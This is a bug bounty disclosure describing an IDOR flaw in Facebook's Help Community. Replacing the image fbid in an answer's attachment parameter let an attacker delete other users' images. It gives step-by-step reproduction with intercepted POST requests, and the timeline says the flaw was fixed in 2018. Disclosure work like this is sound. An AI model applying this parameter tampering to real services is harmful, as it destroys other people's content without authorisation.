How I was able to delete any image in Facebook community question forum


Facebook Community Question Forum is a dedicated space where users could seek assistance and connect with others by asking questions across various categories. Whether you were looking for advice, troubleshooting, or general information, this platform allowed you to engage with a supportive community. Users and facebook support team, contributed answers to help address queries effectively

The finding

While testing the feature that enables users to upload images when responding to questions as comments, I identified and promptly reported a security vulnerability. Specifically, the parameter that responsible with managing these images exhibited susceptibility to an Insecure Direct Object Reference (IDOR) bug during my examination. If successfully exploited, this bug could have allow a malicious actor to delete any image—whether present in posts or comments within Facebook Help Community

Reproduction Steps

  • Initiate Attack:
    • From the perspective of the attacker’s account, navigate to Facebook Community and select any question.
    • Respond to the question by adding an image.
  • Intercept Request:
    • Utilize Burp Suite to intercept the request. The POST request will resemble the following:
POST /help/community/async/post_answer/?view=top&question_id=[any_question_id]&helpCommunityPath=%2Fbusiness%2Fhelp%2Fcommunity%2F&dpr=
fb_dtsg=xxx&answer=test&attachment=%7B%22fbid%22%3A275252333010477%7D&view=top&__user= ...etc

Where attachment={“fbid”:275252333010477} and fbid represents the ID of the uploaded image.

  • Extract Victim Image fbid:
  • Manipulate POST Request:
    • Replace the victim image fbid (e.g., 500237373646433) in the value of the attachment parameter in Step 2. The altered POST request will appear as follows:
POST /help/community/async/post_answer/?view=top&question_id=[any_question_id]&helpCommunityPath=%2Fbusiness%2Fhelp%2Fcommunity%2F&dpr=
fb_dtsg=xxx&answer=test&attachment=%7B%22fbid%22%3A500237373646433%7D&view=top&__user= ...etc

Exploit Deletion Vulnerability:

  • By deleting the answer containing the manipulated image, the attacker can unintentionally delete the victim’s image, as both images share the same fbid.


  • Sarmad – 27 Jan 2018:
    • Initial Report.
  • Meta Bug Bounty – 07 Feb 2018:
    • Report Triaged.
  • Meta Bug Bounty – 13 Feb 2018:
    • Issue Fixed by Meta Bug Bounty.
  • Sarmad – 19 Feb 2018:
    • Fixed Confirmed.
  • Meta Bug Bounty – 23 Feb 2018:
    • Bounty Awarded.